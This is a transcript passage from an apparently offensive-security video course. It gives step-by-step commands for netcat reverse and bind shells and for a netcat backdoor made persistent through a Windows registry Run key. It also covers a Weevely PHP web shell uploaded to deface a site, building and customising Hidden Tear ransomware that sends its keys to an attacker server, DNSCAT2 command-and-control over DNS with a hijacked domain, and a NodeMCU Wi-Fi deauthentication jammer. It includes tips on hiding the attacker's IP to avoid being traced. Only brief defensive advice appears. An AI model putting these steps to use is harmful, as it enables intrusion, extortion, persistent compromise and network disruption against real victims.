this port, please redirect it to this file. Call it like output.exe. So now it's listening, and whatever comes on this port will be redirected to output.exe. On our Kali machine, we will transfer a file. So let's locate any file. For this purpose, I'll try to locate SBD. I'll select this file here, .exe. So I'll select this sbd.exe. I'll copy it, and then I will issue the command of nc -nv, the IP address. Then we will connect on the port 2222. Then we will put the SBD. By issuing this command, we have transferred the SBD file, .sbd.exe file from the Kali machine to the Windows machine. If I go here, I will see that a new status has been issued. Connection from this IP address, my public IP address of my router. So if I quit this session and go to dir to list the directory, I will be able here to see this file, output.exe, that I have transferred from my Kali machine to my Windows machine. If I open this here, I'll be able to see this file, and this is the size and the creation date and time of the file. So the fourth example is about remote administration. As we saw earlier in this presentation here, the slide, we have the two machines, the Kali, which is on our LAN, and the Windows machine, which is on the cloud. Suppose that the user using the cloud machine wants a remote assistance from the user using Kali machine. So the user using Kali will log on remotely to the user on Windows machine. The user on the Windows machine will issue this command, nc -nlvp, then the port 2222, then -e cmd.exe. This command says any user who connects remotely on the port 2222 will be redirected to the command prompt, the command or the console, the command.exe. From the Kali side, we will issue this command nc-nv, then the IP address, then the port. When you press enter, you will be redirected to the command line of Windows. So now you have full control to remotely manage Windows through the command line. You can list the files here, and sky is the limit. Now you have full access and full control over the command line. In the last example, suppose that the user using Kali wants a remote assistance from the user on the Windows machine. But the user on Kali is behind a firewall and his IP is NATed, so he cannot expose the services port as the Windows guy did previously. So in this case, we will go to the Windows machine here. Let's stop this. And we will issue this command nc-nlvp and then this port number. Then from our Kali machine, we will put this command nc-nv IP address, then the port we want to connect to, then the parameter -e, which is to run a program, and which program we will run. Surprisingly, it's the bash command. So the connection is now open. If you go to our Windows machine and run a command, a Unix command like ifconfig, and press enter, now we have full remote access to the bash terminal on Kali, and you can see here that the IP address is 192.168.211.130 and all the other information. You can as well issue any other command. So as you guessed, you can use Netcat as a backdoor to access systems. One of the drawbacks of Netcat is that the traffic is not encrypted. For that, we have an enhanced version of Netcat called NCAT. It is important to note that because running Netcat creates open ports on your machine, the use of Netcat can present a significant security risk if you use it improperly. So make sure not to leave Netcat running while you're not using it. Well, exploiting a computer is a really great work. However, our goal as penetration testers is to maintain access to this compromised computer and to reduce the time we already consumed and all the efforts we put in attacking the same machine over and over again. So for this purpose, we need to install a backdoor upon our first access or compromise. To do this, we will use Netcat for this purpose, and as we saw earlier in the previous video, that Netcat can act as a simple backdoor. So suppose that you have a Meterpreter session on a compromised computer. In this case, my computer is a Windows 10 machine and I have a Meterpreter session. So the first thing I need to do is to upload this Netcat program. For this purpose, I will issue the upload command from my Meterpreter session, and I will refer to the Netcat program on my desktop, and then I will point to the location where I need to upload it on the Windows machine. It will be under syswow64. So as you know, on the Windows 10 machine, which is a 64-bit machine, you have system32 and 64 directories. Windows automatically handles the file placement of your 32-bit file or 64-bit files. In this case, this nc.exe is a 32-bit file, so even if you put it in system32, it will automatically appear in syswow64. So just to make it easier, I'm writing this here. Just press enter, and you will see that the file has been uploaded to this directory. Let's go to our Windows machine here and try to search for this file. This PC, Windows, then syswow, then I'll search for nc.exe. As you can see, 542. So yeah, this is the time I have uploaded this file. Going back to my Kali machine, now we have the file placed on the victim's machine, okay? So we need to have a mechanism that this file is booted or loaded upon the boot of the machine each time. So each time the user restarts or boots the machine, this netcat file will starts listening by itself. So for this purpose, we need to create a registry key called netcat that will boot up the service every time, as we said, the system is started. So this will give us actually permanent access to the victim's machine. So on the Meterpreter session as well, just write the reg enum key. We just want to see the list of services that are automatically run currently on this target machine. Okay, so K for a key, and write this registry entry HKLM software Microsoft Windows current version, and here we go. There are no entries in this key. So now we need to create the key in order to set this process to run upon the boot of the computer. So use the command of reg setval key and use the same value for the key. Then use the v parameter for the new value, and we call it netcat. And then we'll use the d for the data. So the data in this registry entry will be, C Windows and syswow64, then nc.exe, and we will make it a listen. So the listener daemon on port 6666. Okay. And then we will execute command.exe. So just hit enter and you'll get a message that it has successfully set the net key. Now, if we go to the Windows machine, let's try to locate this registry entry. Let's search for that from the start. Try to press find and search for the netcat value, and you will see that the registry entry netcat has been created, and this is the value that we've just passed from the Meterpreter. I'll go back to my Kali machine and I will reboot this remote computer. If you go here, you'll see that it has started the reboot sequence. If I go back to my Kali machine, I will see that the Meterpreter session has died. Again, to the Windows machine after the reboot, and let me access that machine. Now I'll go directly to my Kali and open a new terminal. Now, if I issue the netcat command pointing to this compromised victim, I should have a quick remote shell. So let's see. V for verbose, and to enter the host address 192.168.211. The remote address was of the machine is 129 and the port is quad 6. Just hit enter and here we go. Now we have full remote access. We have a shell for Windows and you can do anything. So sky is the limit now, and your backdoor is installed, and you can access the remote target anytime, even if the target machine has been patched or upgraded or etc. I'm gonna show you how to deface a website by replacing its contents in just a few seconds using a tool called Weavly. First of all, we will generate a malicious file that will allow us to have remote access to the web server in order to manipulate its contents. This malicious file is actually our back. So open your terminal here and write Weavly. Then write Weavly generate. We'll be using the last command here to generate our backdoor. Weavly generate, then select a password for your file, which is 123 in this case. Then select the path that you will create the file in. So I've created the file on my desktop, so just list here and try to see the content of this file. You will see that the content of this file is encrypted, which actually gives us another layer of protection. I have created a simple file for this tutorial here. It's a generic website that has a couple of pages in addition to upload your CV page. Now, the purpose is to upload our backdoor file to this web server. Many of the websites there, they offer this feature where you can upload your CV, you can upload a couple of images. Many of them block PHP extension files, but some of them, they don't do so. So you just have to check the vulnerable website for that. You can as well leverage what we've learned before in order to hack remotely over FTP, and then you can upload your backdoor file. Now go here to upload your CV, click on browse, select the backdoor file that we've created and upload. You will see that the file backdoor.php have been uploaded. It's supposedly uploaded under this path here. So let's take that here, copy that, go again to your terminal and issue the weebly command. Now we want to establish a remote session with our backdoor file, so we will use this command. Again, write weebly, then enter the URL and change the upload.php here to backdoor.php and then provide your password. Let's try to see if it's connected. Just list here, and now you will be able to see the content of the files on the server. You will as well be able to do the sprint working directory. You'll see that we're working under var www.html.content. You can as well go to the root of this website, var www.html, and do another listing. You will see that this is the index.php file, which is the home page. Again, let's go to the home page here and try to refresh. So now we want to deface this website. We will remove this index.php and upload our index.php. For this purpose, you can type help in order to see all the modules that you can use on Weebly, such as you can upload files, you can download files, you can brute force SQL, you can dump SQL databases, etc. For this purpose, I'll be using file upload and this command, remove the file. So now we will remove, let's go listing again. We will remove file underscore rm, remove index.php, and it'll give us true. Let's go again to the web browser here and just refresh the page. So the index.php now is gone. Again, let's go to our Kali machine and try to upload a simple index.php file that I've just created. It is on the desktop again. So root desktop index.php. Now we specified the origin. Now we have to specify the destination of that, which will be again under var www.html, and it will be named index.php. It will give us a true. Now let's go again to the website and refresh it. And here you go. We have defaced the website and uploaded our own PHP index file.
I will show you how super easy it is to create a ransomware. Any script kiddie with access to any of the tools that we will see now will be able to easily customize his own ransomware, send it to you, and ask you for money. For the sake of this tutorial, I've created a simple wallpaper here that will be our message to the victim that he will not be able to see his files. He needs to contact us at a certain address, maybe pay us money, transfer bitcoins, so that we will help him to view his files again. Open the tool. With just a couple of options selected here and clicks, you will be able to create your own ransomware. We will select the wallpaper, which will be our message to the victim, and we will select an icon that mimics a PDF file. Select anti-kill and UAC exploit and press on build. You will be able to see here the ransomware file created. Similarly, press on virus fixer PC and remove these two options from here. Press on build to get the decryptor. Now we have two files here, the ransomware file and the decryptor file. Let's go to my desktop to see that I have a couple of icons here, images that I can view, files that I can open, etc. Okay, I will go to my ransomware, double click on that. Notice what will happen on the desktop. These files will be locked and the wallpaper will be changed to our custom wallpaper that conveys a custom message to the end user. Let us try to open any of these files and you will see that they cannot be viewed. Now, after the end user usually contacts the attacker or pays him money, transfers the bitcoins to him, the attacker will provide him with a decryptor file in where the victim will be able to restore his files. If you double click on that, everything will go back to normal. Now, after running the decryptor, let's try to open these files, and here you go, everything is back to normal. For you not to fall victim of a ransomware, first of all, do not pay the ransom, because this act only encourages these attackers to perform more of these actions. Restore any impacted files that you have from a good backup. Do not provide personal information when you answer your calls or emails, because most of the times these attackers will try to trick you in order to install such malware on your PC. Always use a reputable antivirus software and a firewall, and make sure you have content filtering on your email. This is really a hands-on tutorial on how to download the Hidden Tear ransomware, edit it, and then execute it on the victim's machine. But before going hands-on, let me tell you some history about this ransomware. The Hidden Tear was an open source project whose goal was to create a simple ransomware in C#. Unfortunately, the project was abandoned on GitHub, but currently it has more than 400 forks, so that you can easily go to GitHub, find any of these forks, and download it. The ransomware uses the symmetric AES algorithm to encrypt the files of the victim. It will then send the symmetric key to a server that we will set up, and will leave the victim with a text file having a message that explains what happened. You need first to install Visual Studio that supports C# language. Then we will go to GitHub and install one of the forks of the Hidden Tear ransomware. We will open the files or the projects in Visual Studio, edit those. After that, we will set up a web server on Kali. We will configure the web server to receive the encryption keys. Then we will move the ransomware and the decryptor to the victim's machine and execute the attack. First of all, you need to go to GitHub, to this link here, and you need to clone the project. After that, you open the downloaded file and you will be presented by two main folders or two main projects. The Hidden Tear, which is a solution in Visual Studio, and the decryptor, which will decrypt actually the files. After you extract the downloaded file, double click on the Hidden Tear and open it in Visual Studio. Right click on the form1.c# and press on View Code. Let us walk through this to make our own Hidden Tear ransomware. This actually is the target of the server that we will need to set up. So we will put the IP here of our server. Then we will create a simple PHP file that will get the encryption keys via the info parameter. Scrolling down, you will be able to see the extension of the encrypted files. You can change that to your own extension. Below, you will be able to see all the extensions of the files that will be encrypted. You can add and remove any of the files that you want to encrypt on the victim's machine. We'll leave that as is for now. Scrolling towards the end of the source code, you will be able to see the path. This is the path of the attack. So here in this example, the ransomware will only attack or will only encrypt the files under the test folder which is found on the desktop. Navigating towards the end of the source code, you will be able to see the text file that we will create on the victim's machine and the message that we will put in this text file. For example, like this message: you have been hacked, send us an amount of 0.5 bitcoins to this address to view your files again. So this read it file will be under the test folder on the desktop. The most important part to explain is this target URL. So here in this target URL, you are sending the key from the victim to the web server that you have set up that will contain the encryption key. So for the sake of this tutorial, we will create a web server on the Kali machine. So here you will have the IP of the web server. Then we will create a file or PHP file on the root directory of the web server to receive the key. So for this purpose, let's remove that here, the file. We will call it keys.php. So we will create keys.php file on the root directory, and we will get the information through the info parameter on that. Here you need to populate the IP of the web server. In this case, it is 211.143. Setting up the web server is quite easy. You go to your Kali machine and navigate to var html. List the contents here. You have the index.php. So now you need to create the keys.php file. Use gedit keys.php, and once this file opens, just paste this code. So this is actually the script, the PHP script in the keys.php file that will get the data from the info get parameter and put it in the data.txt file. For this purpose as well, we need to create the data.txt file in the same root path of our web server. Make sure you save this file. Now we need to create the data.txt file as well. So use the same command, gedit data.txt. Open the file and make sure to save it. After you create the data.txt, it's important to grant it access. So you go here, var www.html, right click on data.txt properties, then permissions, go to the group, navigate to www-data and give it read and write access. Now let's list the directory here. We have the data.txt to save the encryption files, and the keys.php, which has the PHP script that will get the information in the info get parameter. The only thing left to do is to start the Apache service. And here we go. Now everything is ready in place for the attack. After we've edited the file with the extension of the encrypted files, the extension types, and the folder that we're gonna attack, along with writing up the message to the victim, you just go here to build and compile the project. Now if you navigate to the hidden tier folder that you've downloaded under the bin and under the debug folder, you will be able to see the hidden tier.exe file. Open the decryptor source code in Visual Studio and match the extension that you've written in the ransomware. Make sure to go to the path and update it. Now go to build and compile the solution. Navigating to the decryptor folder, bin, debug folder, you will be able to see that a decryptor.exe file has been created. Now we will move the ransomware and the decryptor file to the victim's machine. For the sake of this tutorial, I've created the test folder on the desktop, and I've created a text file. In that, let's call it demo. In that demo file, you will see this is a demo for the hidden tier ransomware. You can as well as many files as you want with the extensions that are listed in the source code of the ransomware. Now we will double click on the ransomware and notice what will happen. The file will change to RedPython extension and it will be encrypted. A new file as well will be populated that has our message. Now let's go to the Kali machine. Remember, in the same directory we had the file data.txt, so let's check what's in that file.
As you can see here, this is the name of the machine, of the victim's machine. This is the username of the victim, and this is the key used to encrypt the file. Now, in order to decrypt the files, just run the hidden tier decryptor, paste the password, which is this one, and then click decrypt files to have them decrypted. It might be the only port that companies do not block. Yes, this is the DNS port. Attackers can abuse this weakness in firewalls to set up a command and control channel that can be very difficult to detect or even block. We need to set up a server with DNSCAT2 software installed that will listen to the DNS queries from the DNS2 client. Once this is established, we can transmit data and even invoke commands over this channel. As you can see here on the screen, this is the server with DNS2CAT installed, and this is the client. All the traffic is blocked through the firewall, consider it a corporate firewall, except the DNS traffic on port 53 that is used to resolve URLs. So attackers will leverage this open port here to set up an external command and control center to perform various types of malicious acts. First of all, we need to install the DNSCAT2 server on our Kali machine and then run it. For this purpose here, just have to copy this. This code will update the repository of Kali and will install Ruby on Rails. Then we'll install the bundler, and then we'll get the DNSCAT2 from GitHub. It will clone it on our Kali machine. Then we will navigate to this directory under the DNSCAT2 folder, and then we'll run bundle install. So let's go here and paste these commands. That's it. Now let's do some listing here. Now you need to run Ruby and invoke the DNSCAT2.rb. And here we go. The DNSCAT2 server started listening to port 53. Now our server is set up and ready. Now we'll go to install the client part. For the client part, just navigate to downloads.skullsecurity.org/DNSCAT2 and install the Windows version. On the client side, I have downloaded that here. I will open command prompt, navigate to the desktop, and invoke this command. So this command is dnscat2.exe, then --DNS space server equal. Now we have to put here the IP of the command and control center. Open a new terminal and let's check the IP. It is 61.144. So by invoking this command, the server that has already presented an interactive shell to remotely control systems will establish this channel over port 53. So encrypted session has been established on port 53, as you can see, and the type is txt cname mx. If you go again, you will see that a new session, new window created, session number 1. Now a connection has been established and the server has been notified of that. To interact with the first session, just type session-i1, and you will see that this is the name of the client here, the victim. Now we have a remote shell to interact with it. Type help and you will see all the commands that you can run remotely, such as upload, download, exec, shutdown, etc. Now let's try to run Notepad remotely. Just type exec notepad.exe and press enter. It will tell you that the request has been sent, and let's go here to the victim and you will see that Notepad has been invoked. With creating each session, you'll be notified here on the server, and you can interact accordingly using this command of session -i and the number of the session. Now, as you can see, a tunnel has been established between the client and server over port 53. Just to make sure that it's over port 53, we will run Wireshark in order to sniff the traffic and investigate the type of traffic being sent and received. We'll select only wired and then we'll press capture. Now Wireshark is active on the server side. Let's go here again and trigger the same command, and let's open Wireshark. As you can see here, the protocol is mainly DNS. So anyone who's monitoring the victim's network traffic will only see DNS queries. This traffic will of course blend with the noise that is present on many networks. Let's say, for example, here, while establishing the initial command and control connection, it requires DNS cat client to resolve a text record, which is basically very normal thing to do. So it will not trigger an alert. So to protect against this type of attack, you should block outbound DNS traffic and only allow trusted DNS servers interaction. You've probably noticed that all of our attacks that we've performed in this course were on our local lab. So mainly we were using two computers. This is the Kali server here and the victim's machine, which lie on the same subnet or network. Now, if you want to take things to the next level, you want to perform these types of attack over the internet, you need to do one more configuration to that. We will be using our public IP here to compile the malware that we are creating on our Kali. Taking, for example, malware compiled on Metasploit, we're using our local IP and local port. Now we will only change the local IP from a private IP to a public IP. All of the other things stay still. We will not do any kind of configuration except changing this private IP to this public IP. Now, on our router, once the victim presses on the malware, our public IP will be resolved. So the traffic will come here. Now we will have the port behind the traffic. So we have different computers and devices behind this public IP here. Where will the traffic go? For this purpose, we need to configure port forwarding on our router to tell it, for example, that on port 4444, which is the port we compiled our malware with, if traffic comes here with port 4444, just redirect it to this computer here, which is our Kali server or the command and control server. It's a very easy thing to do and it's pretty straightforward. First, open your browser and type what is my IP. You will see here your public IP. So just take that, compile your malware with, and every other single configuration stays the same. Now go to your router here, log in, go to advanced, go to the port forwarding settings under firewall. Now you need to enable the port forwarding option. Just press on that and you need to put the IP of the Kali server here. So let's go here to the Kali and check the private IP of that. It is 1.108. So I'll put here 192.168.1.108 and now I'll specify the port that I've compiled my malware with. So the traffic that comes to my router using this port redirected to this IP, and the traffic shall be on the TCP protocol. Just press on apply changes. You will see that a new record will be created here, which explains what we've just said. Now going back to this drawing again, all the traffic that will come here will hit our Kali server using the port forwarding configuration on our router. So actually now your Kali machine is accessible
from the internet. Now, putting your public IP like that in a malware and compiling it can be an evidence against you. So we need to find a way to hide our identity or hide our public IP. For this purpose, we will use some kind of dynamic DNS service. You can find lots of those over the internet, but the one I will be using here is called NoIP. Just go here to NoIP, register for an account, and log in. I'll show you my account here. So once you register, it will ask you to create a URL. So the URL that I've created is called mykali.sites.net. This is free and expires in a month. So this will be my domain name that I'll be using while compiling my malware. So this domain name will point to my command and control center, which is my Kali machine that resides on my local network. For this purpose, you need to download the Dynamic Update client. You can download it on Windows, Mac, and Linux. I've downloaded it here. You need to sign in with your account, and it will map your public IP. This is my public IP here. You can go to your what is my IP. It is the same. It will map your public IP to the domain name that you've just registered for. So now, if I go here to my dashboard, Dynamic DNS, host names, it will tell me that mykali.sites.net is mapped to this public IP here. So instead of exposing my public IP, I'll just put that here, and the same configuration will be applicable. Now this IP can be dynamically changed to this domain name here, and it will be difficult for anyone to track you. You can employ lots of other ways as well, like using VPN to use the IP from a different country, for example, and etc. So now when we press on mykali.sites.net, it will resolve to this IP here. So you might guess it. Let's press on that here, copy the address, and just paste it here and see what will happen now. And it resolved the homepage of my router, which is not a thing that I want to do. So similarly, you can sign in again to your router, enable port forwarding. Now I want to forward this traffic to, for example, my client here that resides on the network. This is an Windows machine system with the IP is 1.109. You can open that here. It has a web server. Now I want to redirect this traffic to my web server. Similarly, as we've done before, enable port forwarding, select the IP. The traffic will be on port 80 and TCP, of course, and apply changes. Now the traffic that will hit the router on using HTTP will be forwarded to our Windows machine with IP 109. Let's try that again. Refresh this page. And here we go. My Windows machine is accessible to the world using this domain name and not an IP address. We've done this setup in the previous lab, and we were able to establish an external command and control center to compromise the victim that has DNSCAT2 installed. All the traffic were blocked except the DNS traffic on port 53. So we were able to compromise this hole in the firewall. Now, how to mitigate this is very easy. Our internal DNS server should only communicate with external authorized DNS servers. And in this situation here, we can easily block the IP of this server and life goes on. Now, we have a kind of workaround on that using this structure here. Now, the internal DNS server will only resolve with external legitimate DNS servers. For that, we block the previous IP. Now, what if we go to, for example, GoDaddy.com or any registrar, register our domain there, and configure the name servers of this domain to point to our malicious server that has DNSCAT2 server installed on. So our local DNS will not talk to the malicious server directly, but will resolve normal query with a legitimate DNS server, but the name servers point to our malicious server. So for this purpose, we need to set up a cloud server here. We need to buy a domain, configure that. So let me show you how to do that. To purchase a cloud server, you can use VPS Cheap or DigitalOcean. These are two providers that can provide a cheap VPS server per month or even per year. I've done this setup. This is my Ubuntu server, VPS server, and this is my public IP here. It's 192.250.236 and 154. And now on our Ubuntu server, you need first to install Git, apt-get install Git. After that, you just need to run the commands that we've run earlier on our local machine. Just copy that and paste it here in the terminal. This will install Ruby and will clone the DNSCAT2 server from GitHub. Now after that, we're ready to run the server. As you can see here, that it has started listening to port 53. Now we can communicate to the server from our client by issuing this command. We can put the server IP here or domain name and then the secret for the connection to be encrypted. To configure the server to accept secret to encrypt the session, you can end the command with -- secret and your secret one. In this case, 1 2 3 4 5 6. Just press enter, and here you go. If you want to connect to the server, you will use this command on the client. Going there on the client, I'm using the DNSCAT command, then server IP, port, and secret. Hit enter, and a session with pre-shared secret will be established. You can as well interact with the session here using the same command we used previously. Let's type the help command and let's run again. For example, Notepad remotely. Let's go to the client, and here we go. We were able to invoke that from a command and control center over the internet. On the other hand, I have another DNS server which is published on the internet as well. The URL or the domain name is pharmamedcrm.com. This is a test domain that I've been using. So now I need to point or to update the name servers of this domain to point to my malicious Ubuntu server that has DNSCAT2 installed. So just go here to the domain under the forward lookup zones. If you're using GoDaddy for that, it's very easy as well to manage these. So just go to the settings of your domain or your domain manager and point the name servers. First of all, you have to create on some registrars, you have to create two hosts for name servers, nameserver1.yourdomain.com and nameserver2 ns2.yourdomain.com. So these two hosts will point to the IP of your choice. So I'll just update the IP here. Here we go, and nameserver2 as well. So now my domain will take some time to refresh this and to propagate this over the internet. So my domain name will point to my malicious Ubuntu server. After performing this configuration on our DNS, just have to issue this command here on your client, and the same thing will happen. You'll be able to perform a tunnel over port 53 using a domain name instead of IP.
You need to make sure that you're presenting value to your client. So writing a penetration testing report is a very important aspect of your penetration testing cycle. The report will be sent to the client and will be directed to different audience from the senior management and the technical team as well. A lot of currently available courses out there lack shedding the light on penetration testing report skills. However, your work is useless without something tangible and useful you give to your client. The report should detail all the outcome and the tests you've done, as well as your recommendations on how to mitigate different security risks. So your final product here is actually a report that shows the service you have provided, the methodology you've adopted, as well as the results and recommendations. You might consider that this is the least interesting part of your penetration testing cycle. You might be right, it might be dry, but without it, the client will not see the result of your efforts. And in reality, the report is a very essential part of conducting business with clients. The adopted methodology comprises of these 5 stages. First, we plan on how to write and address our report. Second, we do information collection. Third, we write the first draft. Fourth, we review and finalize the report. And finally, we send it to the client. The first phase is the report planning phase, which comprises the following sub-phases. So the objective of the engagement is very important to highlight. It's mainly the objective set by the client. You should as well highlight any assumptions such as in-scope and out-of-scope systems. You should as well mention the time you will do your testing. This can be for many reasons, such as the presence of key IT personnel, as well as not to interfere with important releases and changes done to the production, and as well to protect yourself. You should as well consider the target audience, because as we said, the audience varies from business stakeholders to technical people. You should keep in mind the position of the people in the organization, the knowledge they should have about this report, and their responsibility and authority to make decisions based on the report. The report should as well be classified the highest based on the information classification policy of your client. So if your client is using the US military classification, it should be classified as top secret. You should as well maintain a clear report distribution strategy. It's advisable to print out the reports in hard copies and deliver them to the right persons in hand. The second phase is the information collection phase. You need to make sure that you have collected all the information in all stages. You need to mention the systems you used and the tools as well. This will ease the report writing and make all the information you need available on each stage. There are 2 approaches here. You can analyze the result you've collected during the information collection phase or during the test itself, or you can leave the analysis to the report writing phase. Under all circumstances, you need to collect the necessary information such as scanning results, vulnerability assessment. You need to take screenshots of the exploits you found. You need to highlight, you need to put some comments, you need to show the logs. You can as well use some documentation tools such as pentest.ws that we will see in the next session. Now you need to start writing the first draft of the report using all the relevant information you collected earlier. This is a very important stage and it actually consumes up to 70% of the report writing time. In this phase, you will use symbols to mark some tasks that you need to check on later, and you can as well later delete such symbols. Before delivering the report to your client, you need to review it internally. Peer review is highly recommended as a second opinion. If you're working within a team, all the team members need to review and edit the report. After that, quality assurance team need to be involved to do further reviews and changes to make sure it follows your company's standards. In a sample report layout, you need to make sure that you've decided upon the page design, such as look and feel in terms of header, footer, the font, and the colors you will use. You will as well include document control, which will be based on your document control procedure. It is recommended to have a cover page that shows the name of the report, the version, the date, and the name of your company which is providing the service. Include a table of content that will list all the sections of the report in a sequence with page numbers. Also include list of illustrations containing tables and charts that you have used in the report. List them in the section with the page number as well. In the executive summary section, think of what you will say if you are presenting your report to the board members. The executive summary target executives where high-level findings and issues need to be raised and discussed. You normally write this section after writing the full report. You need to put the scope of work that clearly identifies the scope of the project, the IP addresses that have been tested, and the type of the penetration testing you have performed. Provide the objectives that the organization will gain after knowing the risks related to the penetration testing of the target systems. In case there are some assumptions that the pen testers consider before or during the test, the assumptions need to be clarified and highlighted. The timeline will show the penetration testing start and end dates. The testing duration, since you don't want to hold any responsibility if some risk aroused after the period of time due to some changes in the target systems. In a glance view, show the number of discovered risks based on priorities in the summary of findings section, and in the summary of recommendations based on the analysis of risks and the high-level findings, the high-level recommendations for the target systems need to be described. In the methodology section, the needed information about how the penetration testing was conducted need to be there, what steps have been followed in order to collect information, analyze them, the risk rating methodology you have used to calculate the risks for each piece of vulnerability, and it may also contain the tools that the penetration tester used to collect such information. In the detailed findings section, present the findings in the most simplest way as possible. For each finding, describe the threat level, the vulnerability rating, analysis of the issue and the impact on the information asset or the system you have tested, risk rating and recommendations. There are a number of ways in which results can be presented. You can present them in a tabular format, graphical format. You can use charts like pie or bar charts. You can even use diagrams. For each piece of vulnerability, a clear description should be shown about the source of vulnerability, its impact, and the likelihoods of the vulnerability to be exploited. Report should explain the source of the vulnerability and the root cause of the problem itself. You should as well highlight the likelihood of occurrence and the impact in case those vulnerabilities were exploited. You should as well use risk evaluation techniques, which is a process of comparing the estimated risk against a given risk criteria to determine the significance of the risk. You might refer to some ISO standards in this scenario. Finally, in the recommendation, and based on the risk rating and the target asset value, the penetration tester should provide an acceptable recommendation with alternatives. And you can provide more than one option for the client in order to mitigate the risk. At the end of the report, it is important to give precise details of all the work by other authors which have been referred to within the report. Include some glossary that details the author name, date of publication, title of the book, the publisher, and the page numbers that you have used. Also include an appendix that can have additional information related to the report. I will now show you some sample penetration testing reports from the internet, just to tell you that there is nothing right or wrong about the format. You can do your own as long as you abide by the general guidelines. You can see the logo of the provider is here, the title of the report, and the service provided to the client here. This is the version control information, the author, and the addressees. A non-disclosure agreement is appended to the report here as well. Disclaimers. This is the content. As you can see, the purpose of the engagement and the scope of the engagement, along with the summary of the findings directly. Then there is a conclusion. If you scroll down, you can see that the purpose is just a simple paragraph along with the scope targeting this application here. This is a summary of the findings or the executive summary of a finding, put in a tabular format with the classification of the risk. Now we go into the risks one by one. You can see screenshots, you can see classification of the risk, and the complexity of the attack can be performed by amateurs or experts or hackers, etc. As you can see, all the information about each of the attacks is included in this summary. At the end of the report, you will see a conclusion with the list of the risks and the rating along with the page references. Another report is from Offensive Security here. Executive summary at first, then types of attacks, then the conclusion. The layout is kind of similar to the previous one, with a summary of findings, executive summary. Now each of the attack is explained along with screenshots, diagrams, again screenshots. If you go to the end of the report, you will see that there are two appendices, Appendix A and Appendix B. Appendix A has the full description of each of the vulnerabilities found, description of the vulnerability along with its rating, the impact, and the remediation or the recommendation. And Appendix B actually is about the vendor.
Now we'll discuss a very nice reporting web-based tool for penetration testing exercises. It's called pentest.ws. You just go there, you can join for free or for a paid account, create an account and sign in. First of all, you need to create a new engagement. So here we will gather everything we have collected in this engagement, all the scans. So let's create this here. So I'll create a HubSpot pen test. After we create the engagement, we have a couple of options actually. We can import a scan that we have already conducted from Nmap using this browse here. You can upload the XML file or you can add an individual host. For the sake of this demo here, I have 4 machines on my subnet, which is 192.168.61.130 till 140. So here in this example here, we want to scan the subnet from 130 to 140. We will scan around 10 IPs. So see how Pentest will automatically populate the script or the command. So you just have here to copy, press on this button and go to the terminal and paste the command. Just press enter and wait for the results to complete. Now that the scan is over, just go again to my web console, press on import, select the file. It will be under root nmap subnet.xml and then press on import. As you can see, it will automatically populate the IP addresses for these 4 hosts within the range 130 to 140. If you press on the first IP here, you will be able to label it by selecting any label here. For example, this will be Mike Ali. You can put the host name here You can add random nodes or any nodes you want. Pressing on the IP address will reveal the list of open ports. In this case, we have the MySQL open port 3306. If you press on that, you will go to the ports tab here with all the relevant information. You can put your remarks here. You can add any usernames, credentials related to the MySQL scan. In the paid version, you will be able to populate a checklist to perform for each of the scan ports. For example, port 80, you have a set of standard checklists that you want to do. You can get it from here. If you press here on the 140, you will see it has a lot of exposed services. This is my Metasploitable box. You can as well see the services on their own. If you double click here and go down, and you want to see which are the servers that have HTTP service exposed, press that, you'll see that 4 of these servers here. MySQL, 2 of these servers have MySQL exposed. So it kind of organizes your work. For this computer here 133, it has detected that it is a Linux machine. As you can see, this is the icon here. For this machine here, my Kali, you can just set the type of the operating system. I'll do the same here for this Windows machine here. The 139 will mark it as a Windows machine. And this is a server. Sorry, this is a workstation. And this 130 is a workstation. And this is a server, and so on and so forth. For each of these machines, you will see the relevant set of open ports there. The other way to add hosts is to go down here and press on hosts. Copy that here, put it down. It will populate the relevant Nmap scan. Just you can copy that and paste it in your terminal. The system has a couple of shell commands. Actually, you just have to type in your IP here, and it will generate the relevant command on Bash, Python, Netcat, etc. It has a CyberChef module which can transform encodings from one type to another. Just feel free to explore this. This is really handful. You can use it all here instead of searching on Google. And the Venom Builder, which is a very nice feature here. We used to write the Metasploit commands individually. So here it will make it easy for you. You just have to identify the local host and the local port, the platform, and the architecture, and the MS Venom command and other commands will be populated for you automatically. For each host as well, you have a free text in order to help you write commands and populate your report. Have you ever thought of blocking some Wi-Fi signals or just kicking someone out from a Wi-Fi connection? Well, this is the right place and the right video. We're gonna create a simple Wi-Fi jammer that is so tiny that it can fit into your pocket, and you can carry it anywhere just by powering it up through a simple power bank or even your mobile phone. So first of all, you need to go to AliExpress and search for Node MCU, and then you'll be presented by these results. Just click on the first one, which is a wireless module Node MCU version 3. MCU actually stands for microcontroller unit. It's a small computer on a single IC or integrated circuit. And actually this device is used to prototype IoT products and applications. It can act as a client, as a server, and as a wireless device at the same time. As per the description on the Node MCU website, it is an open source, interactive, programmable, low-cost, simple, smart Wi-Fi enabled device. The deauthentication attack is the main application that we are gonna build on this chip. This attack will show you how vulnerable the 802.11 Wi-Fi standard is. The deauthentication attack is used to disconnect devices from their Wi-Fi network, and it's a huge vulnerability in the official 802.11 Wi-Fi standard. In 2009, the Wi-Fi Alliance, they actually fixed this problem in the 802.11W standard. They increased the security by providing data confidentiality of management frames. They added mechanisms that enable data integrity and data authenticity and replay attack protections. However, the majority of the access points and clients are vulnerable to this attack. So you just need to purchase this from AliExpress. After that, you just connect this device to your laptop using USB cable. And after that, you need to go to this site here and install the USB connectivity driver. This is very important. You need to see this in the device manager, so to tell you on which port it's connecting. After that, you can go to the website deauth.me, and here is an online interactive step-by-step tutorial on how to set up the Node MCU. It will ask you first, let's go to the first page here. If you're a novice or expert, just press on novice here. It will tell you that you need to download this bin file. Just click it here and it will download automatically. It will actually download it from the GitHub. You can see the latest releases of the bin file and download the latest release. Let's go back to this site here. Press next, select the operating system you're using, and you need to press here as well to download the Flasher software. The Flasher software will help you upload the bin file or populate the firmware on the Node MCU device. Just press next, select the COM port that the board is on. Just press next and you'll be presented with a step-by-step on how to upload the firmware. You need to open the Flasher. Let's open it here. Notice that I'm connected. The device is connected to COM8 port. You go to config and select the location for the bin file. Just select that and press and open. Now let's press next here. It is telling us to press on operations tab and press on the flash button. Next, you go here, select the COM8 port, and then press on the flash button. It will take some time to upload the firmware, and once you see this check mark, it means that the firmware has been uploaded successfully. A couple of things you need to take care of before doing that is to go to the Advanced tab here and use the default that you can see on the chip. Now, once things are in place, you need to connect to this Wi-Fi SSID here named Pwned. So let's do that. Open the Wi-Fi here, and this is the newly created SSID. Click Pwned and press connect. You'll be prompted to enter a password for the first time. Let's go here, the author. Just click next, and you'll be connected to the Pwned network. Now we need to go to this IP here, 